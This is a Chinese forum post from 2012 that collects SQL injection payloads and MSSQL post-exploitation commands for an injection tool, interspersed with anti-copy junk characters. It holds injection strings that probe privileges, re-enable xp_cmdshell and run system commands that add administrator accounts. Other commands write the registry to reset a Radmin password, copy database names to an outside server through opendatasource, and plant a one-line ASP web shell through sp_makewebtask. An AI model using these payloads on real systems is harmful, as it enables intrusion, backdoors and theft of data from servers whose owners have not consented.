找回密码
 立即注册
查看: 2593|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令+ H; ]# K- t' a
//看看是什么权限的
$ H' l$ r  I3 A5 M2 M  Sand 1=(Select IS_MEMBER('db_owner'))6 Y2 ~( F  @; _4 O1 a' N1 E7 q
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--3 g/ `" ?$ o* R% l& y4 ~2 G

% _4 `9 X6 P8 |5 Y. i/ r1 a3 f6 ~//检测是否有读取某数据库的权限. T/ E' |) f0 I0 P7 y
and 1= (Select HAS_DBACCESS('master'))7 C% m5 N8 ], s) A" s. S9 b. |
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
$ Q5 I' _( a- I% O2 d2 s' K6 V# Q& E/ ?; P$ s+ `" e7 G

  D+ @: Q9 T( `# O* W数字类型1 p, Q$ \4 ~4 T) n5 |, e! }! ]  t  @
and char(124)%2Buser%2Bchar(124)=0
( R2 p: i& @. F' z6 J+ U( m, o6 {! ~4 r9 ?; T; ?( Y% I7 F+ R: r( E$ I
字符类型0 [4 G/ U& |0 ^5 N9 V+ P
' and char(124)%2Buser%2Bchar(124)=0 and ''='
; m$ g& N6 b) e' T6 ?! h6 d6 ]9 T6 A) K, @2 G3 J$ M* p
搜索类型: q# b( e. ?% z. @, z
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
3 T" H0 n! H, t9 e0 H% v4 _1 ]( v# O7 j. k  h
爆用户名8 |) @3 q3 R' _# Z4 k
and user>0% M% C, o" u* Z2 h9 ~2 C
' and user>0 and ''='& n0 I& k% u) {: j* d" T

+ t& Z7 v) f# x检测是否为SA权限
; x% m! ~/ }5 @6 Sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
6 C2 J2 E& {; x) A7 r1 q5 ?& JAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --3 T9 V: d. x, y
- N! I4 F' g8 Q3 y1 j- C! S
检测是不是MSSQL数据库
! F( i3 D* B; Y1 Eand exists (select * from sysobjects);--
, P$ b% v( A. V9 B. ?' q1 N
$ V. w; W0 W) a. v检测是否支持多行
' q/ Y' M, K" v: g0 d+ L" L;declare @d int;--   o" a% z, ~" U- W- O; k$ V
4 V% ?6 M2 P! F( X: H& [+ b9 {
恢复 xp_cmdshell
! I8 `/ q1 u( N& ]8 {' d- M. U;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--3 D; u, z/ _' B6 Q

7 s  ?, w/ v5 t, a5 o- D4 X- H
7 y, W: \, N9 E3 k0 U3 Wselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 2 s& H* r2 v- u/ t
$ c% Z( _# f" i: L* o' [3 ^
//-----------------------
' w) h* ]8 G% Y: }7 Y4 T//      执行命令
/ ]: G7 e+ C- \$ r, ?! S//-----------------------4 D7 O7 s1 r* x" T# n; v6 @' D
首先开启沙盘模式:
5 `) L7 D1 W8 O2 m6 uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ s6 w% V4 k& e' X$ f' Y; B, I6 r- R
然后利用jet.oledb执行系统命令4 H5 C& o' N- K2 Q. H; ^
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. v  A: ?2 `! ~- X. p0 W: v/ y
6 o5 w, |- ~( b+ ^执行命令9 v! P4 m- i9 J
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--/ _! D$ s4 e1 A5 \/ H9 n7 C! ]
9 B, b. t" z( ~1 t5 i0 a
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 D5 K) L. F8 Z
! W9 Z, e: l) g' Z判断xp_cmdshell扩展存储过程是否存在:# E  N7 F  ~( s0 D+ T
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')3 j8 ^6 k1 V. q* D
; l" h# j' ?+ _3 C' L
写注册表1 p9 F+ |6 D% _+ X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& h1 {0 d2 ~7 @5 {& U& V; {
: {0 d' R/ R/ K# L  s4 }7 p1 F
REG_SZ0 q: v+ t4 F% E5 h/ N

; k# ~1 [$ k% P读注册表* w. |1 n7 W! Y* E4 _
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
, T3 r) F$ V0 Q0 ~3 k3 g: v4 _
读取目录内容6 P1 ]3 F/ B7 q( Q$ l9 C. y
exec master..xp_dirtree 'c:\winnt\system32\',1,1. H# W! F  k: j# U( q6 O9 f# }
1 J0 ^+ L) B/ |- r3 l+ N/ Z

5 ?8 V4 Q6 |0 e! j7 P数据库备份
! D" b, J6 c- }+ a  ]backup database pubs to disk = 'c:\123.bak'
4 n+ G1 m7 z1 i# T, P+ v
& T9 r$ t7 k' n4 l% d( g//爆出长度
! m' n' f+ Y( g2 l3 X9 C7 F5 hAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--7 K; @! p% }4 B/ O
4 `& H) e: p* d5 ?8 }4 f9 I. [" B

) O2 I/ d/ g8 w1 F1 c* t$ P4 Z5 _
* b$ w# z/ t2 X' x* R更改sa口令方法:用sql综合利用工具连接后,执行命令:9 P: r: D6 w* e3 r4 O
exec sp_password NULL,'新密码','sa'
7 D; e, Q: Z' x9 B3 Y! h2 U
; R2 C' c; r6 q, p3 y添加和删除一个SA权限的用户test:* B& `( H/ f$ U; ?, L* R
exec master.dbo.sp_addlogin test,ptlove4 C$ O, X7 C  E% A. g% \5 @
exec master.dbo.sp_addsrvrolemember test,sysadmin' k- I. D! l2 p! y9 b4 D% J
! k  I0 ^5 D  r
删除扩展存储过过程xp_cmdshell的语句:
* L0 C, v, D! R7 I; _exec sp_dropextendedproc 'xp_cmdshell'
, c- H0 H0 `1 ~( J6 I- l6 P; Q5 [" ^5 p+ K0 Q
添加扩展存储过过程
8 P- N1 I0 }* K* ]" |/ DEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
7 J  ~# E2 k$ q! wGRANT exec On xp_proxiedadata TO public
+ C7 \$ L& ~8 h  d
% I* q6 _* G! v8 p
8 p2 ]/ U% S( f; d7 ~停掉或激活某个服务。
) X3 @3 C5 i! z
9 E) w1 p: b8 mexec master..xp_servicecontrol 'stop','schedule'
8 v4 s: h/ Z# C% f5 U4 k) rexec master..xp_servicecontrol 'start','schedule'
6 [' `5 U! K& l; S8 ?1 S6 J" Q+ E4 ]. }! c! v% l8 D9 H5 L, t
dbo.xp_subdirs
) N' P- j! ]" f8 A+ B% X4 v  Q/ D& R. z1 i; o5 _( r
只列某个目录下的子目录。
& h% G9 J" M( txp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'3 d! `' t8 M! h2 w. J

9 p# r+ e. t. k# T1 [dbo.xp_makecab7 _! N$ U; C6 M

% p8 N( i! G+ T2 [将目标多个档案压缩到某个目标档案之内。
" X) h1 U% b; x4 U6 Q: N所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
  `: k  Y  m# S2 _) i  L* Y$ ^) V7 G5 u$ G$ y; Y6 d8 ~
dbo.xp_makecab
( U1 D0 U: x" L1 r" {6 m6 K9 g'c:\test.cab','mszip',1,
+ c; Z8 ^4 g2 r& O4 b: S  e'C:\Inetpub\wwwroot\SQLInject\login.asp',
8 d: i! ]+ R0 g; d3 p'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'1 R% f) ~) b! x4 m! d$ J9 q

$ Q! T  T3 h" R. wxp_terminate_process0 x+ A" o9 s; M, b, y# n) U
! I! b* @5 _+ ]6 i* S
停掉某个执行中的程序,但赋予的参数是 Process ID。$ N/ y& T9 H9 R: z" p4 [& ]  F
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 a1 M7 P. g0 q' V3 T9 L% I% m/ \
& k+ _$ {" G* @3 B4 N2 Kxp_terminate_process 2484& `1 Q: e5 B% [2 T8 I$ A, U) K: T' M
. O# Z$ C, b/ `0 o
xp_unpackcab  {3 k# l+ v' C, W  x0 `

6 J- K. H1 B0 H解开压缩档。8 y) v" ^0 p  r  J

9 N0 ]. |, A$ z8 \$ N" V9 _3 Cxp_unpackcab 'c:\test.cab','c:\temp',1
. t# k  Q. D  Z: N- o# d4 @9 x$ y' s
( J# |/ O$ r: I' V6 v9 E
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
) m) o" S  h: x: M
; h- f; X1 P6 B  [) Y, b$ G5 rcreate database lcx;( x- }3 x, r1 O
Create TABLE ku(name nvarchar(256) null);
& ~8 A8 o4 T5 ^5 e+ p8 v$ V# [Create TABLE biao(id int NULL,name nvarchar(256) null);+ y, f& w4 A' t! ^& S$ k

5 B9 m& h% Z# B6 c; O. a3 R# m+ g//得到数据库名
4 x# Z) S- S+ k/ ^  V, Minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
" e* p) d# E' J9 w$ q. ~6 k) X: T% Y
. k; }' u' l( o% ~3 k# d0 u
//在Master中创建表,看看权限怎样
* b& r1 ~" Z) R, ?  OCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
1 V  r9 M$ c# n+ q/ ]7 M: o2 t' M8 j' [; X" R; P
用 sp_makewebtask直接在web目录里写入一句话马:
/ w* I4 n& U- l. @http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
2 L4 Z& _& F# u- P! y. I1 F. W
" O2 D* n) m# D& E6 U9 w//更新表内容
* ]3 U  z9 f- m2 UUpdate films SET kind = 'Dramatic' Where id = 123
7 h4 L$ a% g3 p/ Q% r+ }2 r% I* o
//删除内容
$ |# J/ Y6 m5 A& e; b+ Gdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表